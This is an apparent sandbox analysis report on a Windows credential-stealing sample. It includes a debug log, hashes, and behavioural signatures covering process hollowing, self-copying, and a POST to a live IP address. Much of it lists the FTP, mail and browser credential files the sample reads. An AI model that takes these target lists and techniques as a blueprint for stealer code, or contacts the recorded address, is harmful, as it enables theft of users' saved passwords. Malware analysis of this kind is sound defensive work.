2020-01-14 13:45:42,154 [root] DEBUG: Successfully injected DLL C:\vtfynxjgxy\dll\ascwMn.dll.
2020-01-14 13:45:42,154 [lib.api.process] INFO: Injected into suspended 64-bit process with pid 568
2020-01-14 13:45:42,186 [root] DEBUG: Terminate processes on terminate_event enabled.
2020-01-14 13:45:42,201 [root] DEBUG: Process dumps disabled.
2020-01-14 13:45:42,217 [root] INFO: Disabling sleep skipping.
2020-01-14 13:45:42,233 [root] WARNING: Unable to place hook on LockResource
2020-01-14 13:45:42,233 [root] WARNING: Unable to hook LockResource
2020-01-14 13:45:42,263 [root] DEBUG: RestoreHeaders: Restored original import table.
2020-01-14 13:45:42,263 [root] DEBUG: Debugger initialised.
2020-01-14 13:45:42,279 [root] DEBUG: CAPE initialised: 64-bit Extraction package loaded in process 568 at 0x0000000074DC0000, image base 0x00000000FF1A0000, stack from 0x0000000000104000-0x0000000000110000
2020-01-14 13:45:42,311 [root] DEBUG: Commandline: C:\Windows\sysnative\lsass.exe.
2020-01-14 13:45:42,311 [root] DEBUG: AddTrackedRegion: GetTrackedRegion(0x00000000FF1A0000) returned 0x0000000000000000.
2020-01-14 13:45:42,311 [root] DEBUG: AddTrackedRegion: Created new tracked region: TrackedRegion->AllocationBase 0x0000000000000000.
2020-01-14 13:45:42,311 [root] DEBUG: AddTrackedRegion: VirtualQuery(0x00000000FF1A0000) -> AllocationBase 0x00000000FF1A0000 RegionSize 0x4096.
2020-01-14 13:45:42,325 [root] DEBUG: AddTrackedRegion: EntryPoint 0x1850, Entropy 3.686831e+00
2020-01-14 13:45:42,325 [root] DEBUG: AddTrackedRegion: New region at 0x00000000FF1A0000 size 0x1000 added to tracked regions.
2020-01-14 13:45:42,342 [root] DEBUG: ExtractionInit: Adding main image base to tracked regions.
2020-01-14 13:45:42,342 [root] INFO: Added new process to list with pid: 568
2020-01-14 13:45:42,342 [root] INFO: Monitor successfully loaded in process with pid 568.
2020-01-14 13:46:11,249 [root] DEBUG: CreateThread: Initialising breakpoints for thread 1324.
2020-01-14 13:46:12,246 [root] DEBUG: NtTerminateProcess hook: Processing tracked regions before shutdown (process 464).
2020-01-14 13:46:17,239 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x0000000000000000.
2020-01-14 13:46:17,239 [root] DEBUG: DLL unloaded from 0x0000000077A00000.
2020-01-14 13:46:17,255 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x00000000FF330000.
2020-01-14 13:46:17,302 [root] DEBUG: ProcessImageBase: EP 0x0000000000013310 image base 0x00000000FF330000 size 0x0 entropy 6.074399e+00.
2020-01-14 13:46:17,441 [root] DEBUG: ClearAllBreakpoints: Error getting thread context for thread 2036.
2020-01-14 13:46:18,346 [root] INFO: Notified of termination of process with pid 568.
2020-01-14 13:46:18,471 [root] DEBUG: Terminate Event: Processing tracked regions before shutdown (process 568).
2020-01-14 13:46:18,924 [root] DEBUG: DLL loaded at 0x74DB0000: C:\Windows\system32\profapi (0xb000 bytes).
2020-01-14 13:46:22,200 [root] DEBUG: DLL loaded at 0x74D80000: C:\Windows\system32\SAMCLI (0xf000 bytes).
2020-01-14 13:46:22,216 [root] DEBUG: DLL loaded at 0x74D70000: C:\Windows\system32\WKSCLI (0xf000 bytes).
2020-01-14 13:46:22,216 [root] DEBUG: DLL loaded at 0x74D90000: C:\Windows\system32\NETAPI32 (0x11000 bytes).
2020-01-14 13:46:22,230 [root] DEBUG: DLL loaded at 0x74D60000: C:\Windows\system32\netutils (0x9000 bytes).
2020-01-14 13:46:22,230 [root] DEBUG: DLL loaded at 0x74D40000: C:\Windows\system32\srvcli (0x19000 bytes).
2020-01-14 13:46:22,278 [root] DEBUG: DLL loaded at 0x74D20000: C:\Windows\system32\SAMLIB (0x12000 bytes).
2020-01-14 13:46:22,309 [root] DEBUG: DLL loaded at 0x74CE0000: C:\Windows\system32\USERENV (0x17000 bytes).
2020-01-14 13:46:22,355 [root] DEBUG: DLL loaded at 0x75820000: C:\Windows\syswow64\CRYPT32 (0x11d000 bytes).
2020-01-14 13:46:22,371 [root] DEBUG: DLL loaded at 0x76C80000: C:\Windows\syswow64\MSASN1 (0xc000 bytes).
2020-01-14 13:46:22,403 [root] DEBUG: DLL loaded at 0x75570000: C:\Windows\system32\mswsock (0x3c000 bytes).
2020-01-14 13:46:22,403 [root] DEBUG: DLL loaded at 0x75560000: C:\Windows\System32\wshtcpip (0x5000 bytes).
2020-01-14 13:46:23,183 [root] DEBUG: connect hook: Failed to dump region at 0x03554828 around 107.175.150.73.
2020-01-14 13:46:25,085 [root] DEBUG: DLL loaded at 0x75190000: C:\Windows\system32\DNSAPI (0x44000 bytes).
2020-01-14 13:46:25,101 [root] DEBUG: DLL loaded at 0x74D10000: C:\Windows\system32\rasadhlp (0x6000 bytes).
2020-01-14 13:46:25,974 [root] DEBUG: connect hook: Failed to dump region at 0x03554828 around 107.175.150.73.
2020-01-14 13:46:28,627 [root] DEBUG: connect hook: Failed to dump region at 0x03554828 around 107.175.150.73.
2020-01-14 13:46:30,171 [root] DEBUG: CreateThread: Initialising breakpoints for thread 1744.
2020-01-14 13:46:30,203 [root] DEBUG: DLL unloaded from 0x77BE0000.
2020-01-14 13:46:40,717 [root] DEBUG: connect hook: Failed to dump region at 0x03554828 around 107.175.150.73.
2020-01-14 13:46:42,308 [root] DEBUG: CreateThread: Initialising breakpoints for thread 1400.
2020-01-14 13:46:52,854 [root] DEBUG: connect hook: Failed to dump region at 0x03554828 around 107.175.150.73.
2020-01-14 13:46:54,444 [root] DEBUG: CreateThread: Initialising breakpoints for thread 744.
2020-01-14 13:47:05,038 [root] DEBUG: connect hook: Failed to dump region at 0x03554828 around 107.175.150.73.
2020-01-14 13:47:06,551 [root] DEBUG: CreateThread: Initialising breakpoints for thread 1620.
2020-01-14 13:47:17,236 [root] DEBUG: connect hook: Failed to dump region at 0x03554828 around 107.175.150.73.
2020-01-14 13:47:18,891 [root] DEBUG: CreateThread: Initialising breakpoints for thread 1180.
2020-01-14 13:47:30,668 [root] DEBUG: connect hook: Failed to dump region at 0x03554828 around 107.175.150.73.
2020-01-14 13:47:32,509 [root] DEBUG: CreateThread: Initialising breakpoints for thread 224.
2020-01-14 13:47:43,180 [root] DEBUG: connect hook: Failed to dump region at 0x03554828 around 107.175.150.73.
2020-01-14 13:47:44,865 [root] DEBUG: CreateThread: Initialising breakpoints for thread 1464.
2020-01-14 13:47:55,457 [root] DEBUG: connect hook: Failed to dump region at 0x03554828 around 107.175.150.73.
2020-01-14 13:47:57,625 [root] DEBUG: CreateThread: Initialising breakpoints for thread 908.
2020-01-14 13:48:08,265 [root] DEBUG: connect hook: Failed to dump region at 0x03554828 around 107.175.150.73.
2020-01-14 13:48:09,980 [root] DEBUG: CreateThread: Initialising breakpoints for thread 1048.
2020-01-14 13:48:20,510 [root] DEBUG: connect hook: Failed to dump region at 0x03554828 around 107.175.150.73.
2020-01-14 13:48:22,023 [root] DEBUG: CreateThread: Initialising breakpoints for thread 1488.
2020-01-14 13:48:32,724 [root] DEBUG: connect hook: Failed to dump region at 0x03554828 around 107.175.150.73.
2020-01-14 13:48:34,161 [root] DEBUG: CreateThread: Initialising breakpoints for thread 1388.
2020-01-14 13:48:45,315 [root] DEBUG: connect hook: Failed to dump region at 0x03554828 around 107.175.150.73.
2020-01-14 13:48:46,858 [root] DEBUG: CreateThread: Initialising breakpoints for thread 888.
2020-01-14 13:48:48,825 [root] INFO: Analysis timeout hit (200 seconds), terminating analysis.
2020-01-14 13:48:48,825 [root] INFO: Created shutdown mutex.
2020-01-14 13:48:49,854 [lib.api.process] INFO: Terminate event set for process 932
2020-01-14 13:48:49,963 [root] DEBUG: Terminate Event: Processing tracked regions before shutdown (process 932).
2020-01-14 13:48:49,963 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x00000000.
2020-01-14 13:48:50,026 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x00400000.
2020-01-14 13:48:50,026 [root] DEBUG: ProcessImageBase: EP 0x000139DE image base 0x00400000 size 0x0 entropy 1.394984e+00.
2020-01-14 13:48:50,088 [root] DEBUG: ClearAllBreakpoints: Error getting thread context for thread 1744.
2020-01-14 13:48:50,088 [root] DEBUG: ClearAllBreakpoints: Error getting thread context for thread 1400.
2020-01-14 13:48:50,151 [root] DEBUG: ClearAllBreakpoints: Error getting thread context for thread 744.
2020-01-14 13:48:50,151 [root] DEBUG: ClearAllBreakpoints: Error getting thread context for thread 1620.
2020-01-14 13:48:50,306 [root] DEBUG: ClearAllBreakpoints: Error getting thread context for thread 1180.
2020-01-14 13:48:50,306 [root] DEBUG: ClearAllBreakpoints: Error getting thread context for thread 224.
2020-01-14 13:48:50,306 [root] DEBUG: ClearAllBreakpoints: Error getting thread context for thread 1464.
2020-01-14 13:48:50,306 [root] DEBUG: ClearAllBreakpoints: Error getting thread context for thread 908.
2020-01-14 13:48:50,368 [root] DEBUG: ClearAllBreakpoints: Error getting thread context for thread 1048.
2020-01-14 13:48:50,368 [root] DEBUG: ClearAllBreakpoints: Error getting thread context for thread 1488.
2020-01-14 13:48:50,447 [root] DEBUG: ClearAllBreakpoints: Error getting thread context for thread 1388.
2020-01-14 13:48:50,447 [root] DEBUG: ClearAllBreakpoints: Error getting thread context for thread 888.
2020-01-14 13:48:50,463 [lib.api.process] INFO: Termination confirmed for process 932
2020-01-14 13:48:50,555 [root] DEBUG: Terminate Event: CAPE shutdown complete for process 932
2020-01-14 13:48:50,555 [root] INFO: Terminate event set for process 932.
2020-01-14 13:48:50,555 [root] INFO: Terminating process 932 before shutdown.
2020-01-14 13:48:50,555 [root] INFO: Shutting down package.
2020-01-14 13:48:50,555 [root] INFO: Stopping auxiliary modules.
2020-01-14 13:48:50,555 [root] INFO: Finishing auxiliary modules.
2020-01-14 13:48:50,572 [root] INFO: Shutting down pipe server and dumping dropped files.
2020-01-14 13:48:50,572 [root] WARNING: File at path "C:\FfIKSGRI\debugger" does not exist, skip.
2020-01-14 13:48:50,572 [root] INFO: Analysis completed.

MalScore

10.0

Malicious

Machine

Name Label Manager Started On Shutdown On
target-04 target-04 ESX 2020-01-14 13:45:21 2020-01-14 13:49:11

File Details

File Name 80c3f9968ecdc33d817040c781e075a19a681cdf.exe
File Size 710656 bytes
File Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 ce41fb6da97d5c9fd57d6dd28ccb3d38
SHA1 80c3f9968ecdc33d817040c781e075a19a681cdf
SHA256 8b6a8a1d17b72868327d74827784df0b51617d28876f0c0951d262ba340ed5a4
SHA512 786e34d3ec90dd519e613782f237ce55b718f30ab9b776ecf06e49f67a72acb909466a589e93513225acb25756d100458e7a901343055fd70859fe4c57658829
CRC32 934C8265
Ssdeep 12288:M6w6OiTNMrC2ZT0vuIvQDNDq8JP8R3HGTtspmYzVMYW3w2Pg67sCKIpEINHLOJmT:MiTTMC2V6ADFSm68YV1wU+VNyJK
TrID
  • 35.5% (.EXE) Win32 Executable Delphi generic (14182/79/4)
  • 32.8% (.SCR) Windows screen saver (13101/52/3)
  • 11.2% (.EXE) Win32 Executable (generic) (4508/7/1)
  • 5.1% (.EXE) Win16/32 Executable Delphi generic (2072/23)
  • 5.0% (.EXE) OS/2 Executable (generic) (2029/13)
ClamAV None matched
Yara None matched
CAPE Yara None matched
Resubmit sample

Signatures

Behavioural detection: Executable code extraction
SetUnhandledExceptionFilter detected (possible anti-debug)
Dynamic (imported) function loading detected
DynamicLoader: CRYPTSP.dll/CryptAcquireContextW
DynamicLoader: CRYPTSP.dll/CryptCreateHash
DynamicLoader: CRYPTSP.dll/CryptHashData
DynamicLoader: CRYPTSP.dll/CryptGetHashParam
DynamicLoader: CRYPTSP.dll/CryptDestroyHash
DynamicLoader: CRYPTSP.dll/CryptReleaseContext
DynamicLoader: vaultcli.dll/VaultEnumerateItems
DynamicLoader: vaultcli.dll/VaultEnumerateVaults
DynamicLoader: vaultcli.dll/VaultFree
DynamicLoader: vaultcli.dll/VaultGetItem
DynamicLoader: vaultcli.dll/VaultOpenVault
DynamicLoader: vaultcli.dll/VaultCloseVault
DynamicLoader: sechost.dll/LookupAccountSidLocalW
DynamicLoader: NETAPI32.DLL/NetUserGetInfo
DynamicLoader: CRYPTSP.dll/CryptImportKey
DynamicLoader: CRYPTSP.dll/CryptSetKeyParam
DynamicLoader: CRYPTSP.dll/CryptDecrypt
DynamicLoader: CRYPTSP.dll/CryptDestroyKey
DynamicLoader: NETAPI32.DLL/NetUserGetInfo
DynamicLoader: NETAPI32.DLL/NetUserGetInfo
Possible date expiration check, exits too soon after checking local time
process: ThGUgOMMWUNV0z.exe, PID 1520
A process attempted to delay the analysis task.
Process: ThGUgOMMWUNV0z.exe tried to sleep 728 seconds, actually delayed analysis time by 0 seconds
CAPE extracted potentially suspicious content
ThGUgOMMWUNV0z.exe: Extracted Shellcode
ThGUgOMMWUNV0z.exe: Extracted Shellcode: 32-bit executable
ThGUgOMMWUNV0z.exe: Extracted Shellcode
HTTP traffic contains suspicious features which may be indicative of malware related traffic
post_no_referer: HTTP traffic contains a POST request with no referer header
http_version_old: HTTP traffic uses version 1.0
ip_hostname: HTTP connection was made to an IP address rather than domain name
suspicious_request: http://107.175.150.73/~giftioz/.mojoli/fre.php
Performs some HTTP requests
url: http://107.175.150.73/~giftioz/.mojoli/fre.php
The binary contains an unknown PE section name indicative of packing
unknown section: name: CODE, entropy: 6.60, characteristics: IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ, raw_size: 0x0007c400, virtual_size: 0x0007c390
unknown section: name: DATA, entropy: 4.10, characteristics: IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE, raw_size: 0x00001400, virtual_size: 0x0000139c
unknown section: name: BSS, entropy: 0.00, characteristics: IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE, raw_size: 0x00000000, virtual_size: 0x00000c05
The binary likely contains encrypted or compressed data.
section: name: .rsrc, entropy: 7.09, characteristics: IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_SHARED|IMAGE_SCN_MEM_READ, raw_size: 0x00024c00, virtual_size: 0x00024a24
Behavioural detection: Injection (Process Hollowing)
Injection: ThGUgOMMWUNV0z.exe(1520) -> ThGUgOMMWUNV0z.exe(932)
Executed a process and injected code into it, probably while unpacking
Injection: ThGUgOMMWUNV0z.exe(1520) -> ThGUgOMMWUNV0z.exe(932)
Deletes its original binary from disk
Behavioural detection: Injection (inter-process)
Spoofs its process name and/or associated pathname to appear as a legitimate process
original_path: C:\Users\user\AppData\Local\Temp\ThGUgOMMWUNV0z.exe
original_name: ThGUgOMMWUNV0z.exe
modified_name: thgugommwunv0z.exe
modified_path: C:\Users\user\AppData\Local\Temp\thgugommwunv0z.exe
Creates a hidden or system file
file: C:\Users\user\AppData\Roaming\24CFE6\6F2024.exe
file: C:\Users\user\AppData\Roaming\24CFE6
Creates a copy of itself
copy: C:\Users\user\AppData\Roaming\24CFE6\6F2024.exe
Harvests credentials from local FTP client softwares
file: C:\Users\user\AppData\Roaming\FileZilla\sitemanager.xml
file: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
file: C:\Users\user\AppData\Roaming\Far Manager\Profile\PluginsData\42E4AEB1-A230-44F4-B33C-F195BB654931.db
file: C:\Program Files (x86)\FTPGetter\Profile\servers.xml
file: C:\Users\user\AppData\Roaming\FTPGetter\servers.xml
file: C:\Users\user\AppData\Roaming\Estsoft\ALFTP\ESTdb2.dat
key: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
key: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
key: HKEY_CURRENT_USER\Software\Ghisler\Total Commander
key: HKEY_CURRENT_USER\Software\LinasFTP\Site Manager
Harvests information related to installed instant messenger clients
file: C:\Users\user\AppData\Roaming\.purple\accounts.xml
Harvests information related to installed mail clients
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046\Email
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f0bb1e5f09f80a488274ca81ffbccd9c
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\Email
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\85e0ee07445e6649ba5bc44e8c7f096a
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\89add512dfedc442ad3626bfcae3c4a1\Email
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\e64b0e0e47cac246ae1cad77acfe3425
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b7dcff830d0db247ab3e99f6d18d3db2\Email
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\Email
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3517490d76624c419a828607e2a54604
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\Email
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\e67eb059ba9d6642890e6a6aa53ab9fb
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\e67eb059ba9d6642890e6a6aa53ab9fb\Email
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f4ef05d8e05bfb4584a20de2c515cad6
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046\Email
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b7dcff830d0db247ab3e99f6d18d3db2
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2\Email
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\89add512dfedc442ad3626bfcae3c4a1
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f4ef05d8e05bfb4584a20de2c515cad6\Email
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761\Email
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f0bb1e5f09f80a488274ca81ffbccd9c\Email
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\e64b0e0e47cac246ae1cad77acfe3425\Email
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Email
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\85e0ee07445e6649ba5bc44e8c7f096a\Email
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\390687b675150348af0b3ed5b57f371b
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\c02ebc5353d9cd11975200aa004ae40e\Email
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\c02ebc5353d9cd11975200aa004ae40e
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a\Email
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001\Email
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\Email
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\390687b675150348af0b3ed5b57f371b\Email
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\Email
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0983914516512248bf1031360569f651
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0983914516512248bf1031360569f651\Email
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3517490d76624c419a828607e2a54604\Email
key: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook
key: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook
Collects information to fingerprint the system
Anomalous binary characteristics
anomaly: Timestamp on binary predates the release date of the OS version it requires by at least a year

Screenshots


Hosts

Direct IP Country Name
Y 107.175.150.73 [VT] United States

DNS

No domains contacted.


Summary

C:\Windows\WindowsShell.Manifest
C:\Users\user\AppData\Local\Temp\ThGUgOMMWUNV0z.ENG
C:\Users\user\AppData\Local\Temp\ThGUgOMMWUNV0z.ENG.DLL
C:\Users\user\AppData\Local\Temp\ThGUgOMMWUNV0z.EN
C:\Users\user\AppData\Local\Temp\ThGUgOMMWUNV0z.EN.DLL
C:\Program Files\NETGATE\Black Hawk
C:\Program Files (x86)\Lunascape\Lunascape6\plugins\{9BDD5314-20A6-4d98-AB30-8325A95771EE}
C:\Users\user\AppData\Local\Comodo\Dragon\User Data\Default\Login Data
C:\Users\user\AppData\Local\Comodo\Dragon\User Data\Default\Web Data
C:\Users\user\AppData\LocalComodo\Dragon\Login Data
C:\Users\user\AppData\LocalComodo\Dragon\Default\Login Data
C:\Users\user\AppData\Local\MapleStudio\ChromePlus\User Data\Default\Login Data
C:\Users\user\AppData\Local\MapleStudio\ChromePlus\User Data\Default\Web Data
C:\Users\user\AppData\LocalMapleStudio\ChromePlus\Login Data
C:\Users\user\AppData\LocalMapleStudio\ChromePlus\Default\Login Data
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
C:\Users\user\AppData\LocalGoogle\Chrome\Login Data
C:\Users\user\AppData\LocalGoogle\Chrome\Default\Login Data
C:\Users\user\AppData\Local\Nichrome\User Data\Default\Login Data
C:\Users\user\AppData\Local\Nichrome\User Data\Default\Web Data
C:\Users\user\AppData\LocalNichrome\Login Data
C:\Users\user\AppData\LocalNichrome\Default\Login Data
C:\Users\user\AppData\Local\RockMelt\User Data\Default\Login Data
C:\Users\user\AppData\Local\RockMelt\User Data\Default\Web Data
C:\Users\user\AppData\LocalRockMelt\Login Data
C:\Users\user\AppData\LocalRockMelt\Default\Login Data
C:\Users\user\AppData\Local\Spark\User Data\Default\Login Data
C:\Users\user\AppData\Local\Spark\User Data\Default\Web Data
C:\Users\user\AppData\LocalSpark\Login Data
C:\Users\user\AppData\LocalSpark\Default\Login Data
C:\Users\user\AppData\Local\Chromium\User Data\Default\Login Data
C:\Users\user\AppData\Local\Chromium\User Data\Default\Web Data
C:\Users\user\AppData\LocalChromium\Login Data
C:\Users\user\AppData\LocalChromium\Default\Login Data
C:\Users\user\AppData\Local\Titan Browser\User Data\Default\Login Data
C:\Users\user\AppData\Local\Titan Browser\User Data\Default\Web Data
C:\Users\user\AppData\LocalTitan Browser\Login Data
C:\Users\user\AppData\LocalTitan Browser\Default\Login Data
C:\Users\user\AppData\Local\Torch\User Data\Default\Login Data
C:\Users\user\AppData\Local\Torch\User Data\Default\Web Data
C:\Users\user\AppData\LocalTorch\Login Data
C:\Users\user\AppData\LocalTorch\Default\Login Data
C:\Users\user\AppData\Local\Yandex\YandexBrowser\User Data\Default\Login Data
C:\Users\user\AppData\Local\Yandex\YandexBrowser\User Data\Default\Web Data
C:\Users\user\AppData\LocalYandex\YandexBrowser\Login Data
C:\Users\user\AppData\LocalYandex\YandexBrowser\Default\Login Data
C:\Users\user\AppData\Local\Epic Privacy Browser\User Data\Default\Login Data
C:\Users\user\AppData\Local\Epic Privacy Browser\User Data\Default\Web Data
C:\Users\user\AppData\LocalEpic Privacy Browser\Login Data
C:\Users\user\AppData\LocalEpic Privacy Browser\Default\Login Data
C:\Users\user\AppData\Local\CocCoc\Browser\User Data\Default\Login Data
C:\Users\user\AppData\Local\CocCoc\Browser\User Data\Default\Web Data
C:\Users\user\AppData\LocalCocCoc\Browser\Login Data
C:\Users\user\AppData\LocalCocCoc\Browser\Default\Login Data
C:\Users\user\AppData\Local\Vivaldi\User Data\Default\Login Data
C:\Users\user\AppData\Local\Vivaldi\User Data\Default\Web Data
C:\Users\user\AppData\LocalVivaldi\Login Data
C:\Users\user\AppData\LocalVivaldi\Default\Login Data
C:\Users\user\AppData\Local\Comodo\Chromodo\User Data\Default\Login Data
C:\Users\user\AppData\Local\Comodo\Chromodo\User Data\Default\Web Data
C:\Users\user\AppData\LocalComodo\Chromodo\Login Data
C:\Users\user\AppData\LocalComodo\Chromodo\Default\Login Data
C:\Users\user\AppData\Local\Superbird\User Data\Default\Login Data
C:\Users\user\AppData\Local\Superbird\User Data\Default\Web Data
C:\Users\user\AppData\LocalSuperbird\Login Data
C:\Users\user\AppData\LocalSuperbird\Default\Login Data
C:\Users\user\AppData\Local\Coowon\Coowon\User Data\Default\Login Data
C:\Users\user\AppData\Local\Coowon\Coowon\User Data\Default\Web Data
C:\Users\user\AppData\LocalCoowon\Coowon\Login Data
C:\Users\user\AppData\LocalCoowon\Coowon\Default\Login Data
C:\Users\user\AppData\Local\Mustang Browser\User Data\Default\Login Data
C:\Users\user\AppData\Local\Mustang Browser\User Data\Default\Web Data
C:\Users\user\AppData\LocalMustang Browser\Login Data
C:\Users\user\AppData\LocalMustang Browser\Default\Login Data
C:\Users\user\AppData\Local\360Browser\Browser\User Data\Default\Login Data
C:\Users\user\AppData\Local\360Browser\Browser\User Data\Default\Web Data
C:\Users\user\AppData\Local360Browser\Browser\Login Data
C:\Users\user\AppData\Local360Browser\Browser\Default\Login Data
C:\Users\user\AppData\Local\CatalinaGroup\Citrio\User Data\Default\Login Data
C:\Users\user\AppData\Local\CatalinaGroup\Citrio\User Data\Default\Web Data
C:\Users\user\AppData\LocalCatalinaGroup\Citrio\Login Data
